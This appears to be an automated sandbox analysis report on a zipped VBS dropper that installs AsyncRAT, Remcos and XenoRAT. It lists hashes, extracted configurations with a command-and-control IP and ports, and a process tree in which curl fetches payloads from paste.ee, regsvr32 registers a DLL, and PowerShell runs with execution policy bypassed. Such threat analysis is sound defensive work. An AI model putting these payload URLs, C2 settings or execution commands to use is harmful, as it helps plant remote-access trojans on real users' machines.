Analysis
-
max time kernel
209s -
max time network
211s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
09-05-2024 10:06
General
-
Target
17193228024.zip
-
Size
44KB
-
MD5
6b887c3c71500c05ff228fc10793795a
-
SHA1
28eb382ed84e04b3686b799307cfeaef65432b35
-
SHA256
609b846da03d889d71b895ab6dd025642066a3b641b48c6486d5443c68f34d7e
-
SHA512
0c2999aa72db279df70ddd78c163b4c1ceddf5f0899a481f838ef839ae4c6aa54908a403bb48666595cdf84ff4f15e04037814e509fa9c0a2c1d15c6c6fde1b4
-
SSDEEP
768:xyeNSvA/nu2hzTNstgGmunfvaQRoih6rznDUyyXQSAxeLGt3Kfkgii+XMKB0xdd:x5NH/u2NUgcHaQRod3DkQ9Faf5Sep
Malware Config
Extracted
asyncrat
1.0.7
MATIDOWN2
141.95.84.40:6465
wcawcaw
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
remcos
xxx1
141.95.84.40:6468
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
asasas-3248IW
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
xenorat
141.95.84.40
asasaa33d3a143vaavwwv
-
delay
5000
-
install_path
nothingset
-
port
6676
-
startup_name
nothingset
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
XenorRat
XenorRat is a remote access trojan written in C#.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 4 IoCs
-
Loads dropped DLL 14 IoCs
-
Registers COM server for autorun 1 TTPs 22 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Start PowerShell.
-
Suspicious use of SetThreadContext 11 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Modifies registry class 50 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17193228024.zip1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17193228024.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\c989926eb17a83e10fa18a7beb6e1a468c88740e157609db9dd7600498f6c148.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\curl.execurl -s https://paste.ee/r/uazpL2⤵
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe" //b //e:vbscript "C:\Users\Admin\Desktop\c989926eb17a83e10fa18a7beb6e1a468c88740e157609db9dd7600498f6c148.vbs"2⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl -s https://paste.ee/r/uazpL3⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"3⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"'5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RC0S.vbs"6⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl -s https://paste.ee/r/kIEYz7⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 808⤵
- Program crash
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\winhlp32.exe"C:\Windows\winhlp32.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\h.vbs"' & exit4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\h.vbs"'5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\h.vbs"6⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\curl.execurl -s https://paste.ee/r/6Y0DE7⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 376 -s 728⤵
- Program crash
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"3⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"3⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3312 -ip 33121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 376 -ip 3761⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logFilesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD55315900105942deb090a358a315b06fe
SHA122fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA51277e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD535c450ef35bb1639a525adcf9c9de2e3
SHA1154b372f0839824bef0854610ef4287d2ef0b47a
SHA2568c2618ef57efc2597e366a0e7b4f972f1ad2186e739fcf8cf3d13526c9b3d00f
SHA5126a26188c2edb68c9333e411a129ae3c74cbe930e2645820edcfee509c10f597b27cd1e675f4bbaf0e16115770c1972e5bb4a2e320ba44d70858c13dee11aa57d
-
C:\Users\Admin\AppData\Local\Temp\RC0S.vbsFilesize
451KB
MD51f1b5ec1770db718a316090a8b98db7f
SHA1ad60d1d1871fe7ef7049741d78915f4f8f28962a
SHA256e6659f8c95c9b063bb58c753e9a8a30c487033b74ca419d59c4b1f29a0725942
SHA51205e2d6aa6705759a5beae8e3152e630f5e48e2bf93b650837c0b6b2ed1fa1cf1b52c27ed9feaa9331b0f76e246c2f9c9e8d3c68bb72e9be7e4cbea848d39bfef
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_js0a0vwr.djt.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\dynwrapx.dllFilesize
13KB
MD5e0b8dfd17b8e7de760b273d18e58b142
SHA1801509fb6783c9e57edc67a72dde3c62080ffbaf
SHA2564ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379
SHA512443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b
-
C:\Users\Admin\AppData\Local\Temp\h.vbsFilesize
451KB
MD534d44a86cf9ddf4e53e6a0aa64a4a975
SHA1d8b0af518dd50d4ebb44d85d640378bd9402c4d6
SHA2564d078c0882e7b5be255180c58a3893d52ab8cb75fe366c934f2bb779a4f9090a
SHA512fdfe7aad3688a3e7fa014e40ada5787370bb2e588a6b1af5fe07877e0b45ddb9d0d418310522c26d3bc5450e06f9c0b794fa2d3f7a1bd4302af250af749ca255
-
C:\Users\Admin\Desktop\c989926eb17a83e10fa18a7beb6e1a468c88740e157609db9dd7600498f6c148.vbsFilesize
451KB
MD550dd276ecb219b58afb8dd4c72921930
SHA16900dcdd573f4261e32ee98f8e15817ea5b17c94
SHA256c989926eb17a83e10fa18a7beb6e1a468c88740e157609db9dd7600498f6c148
SHA5123639ec354ce49229d31fc662c97b50d233203c23571d7cb8b57cd7d42cef62afce629b9237a7e263e9986501a49c6cdaa7597a430f62ffc590830d4354e30f1c
-
memory/1192-85-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/1896-78-0x0000000006210000-0x000000000625C000-memory.dmpFilesize
304KB
-
memory/1896-73-0x0000000005640000-0x0000000005994000-memory.dmpFilesize
3.3MB
-
memory/3324-49-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-64-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-101-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-100-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-98-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-99-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-96-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-97-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-95-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-94-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-48-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-92-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-51-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-50-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-93-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-58-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3324-59-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/3536-62-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/4576-7-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4576-20-0x0000000006910000-0x000000000692E000-memory.dmpFilesize
120KB
-
memory/4576-19-0x0000000005B30000-0x0000000005B3C000-memory.dmpFilesize
48KB
-
memory/4576-18-0x0000000006970000-0x00000000069E6000-memory.dmpFilesize
472KB
-
memory/4576-17-0x00000000059C0000-0x0000000005A26000-memory.dmpFilesize
408KB
-
memory/4576-16-0x0000000005F00000-0x00000000064A4000-memory.dmpFilesize
5.6MB
-
memory/4576-15-0x00000000058B0000-0x000000000594C000-memory.dmpFilesize
624KB
-
memory/5040-22-0x0000000002CD0000-0x0000000002D06000-memory.dmpFilesize
216KB
-
memory/5040-29-0x0000000005880000-0x00000000058A2000-memory.dmpFilesize
136KB
-
memory/5040-23-0x00000000059A0000-0x0000000005FC8000-memory.dmpFilesize
6.2MB
-
memory/5040-40-0x0000000006B70000-0x0000000006B92000-memory.dmpFilesize
136KB
-
memory/5040-39-0x0000000006B20000-0x0000000006B3A000-memory.dmpFilesize
104KB
-
memory/5040-38-0x0000000006C10000-0x0000000006CA6000-memory.dmpFilesize
600KB
-
memory/5040-37-0x00000000066E0000-0x000000000672C000-memory.dmpFilesize
304KB
-
memory/5040-36-0x0000000006650000-0x000000000666E000-memory.dmpFilesize
120KB
-
memory/5040-35-0x00000000062F0000-0x0000000006644000-memory.dmpFilesize
3.3MB
-
memory/5040-34-0x0000000006140000-0x00000000061A6000-memory.dmpFilesize
408KB
-
memory/5368-54-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB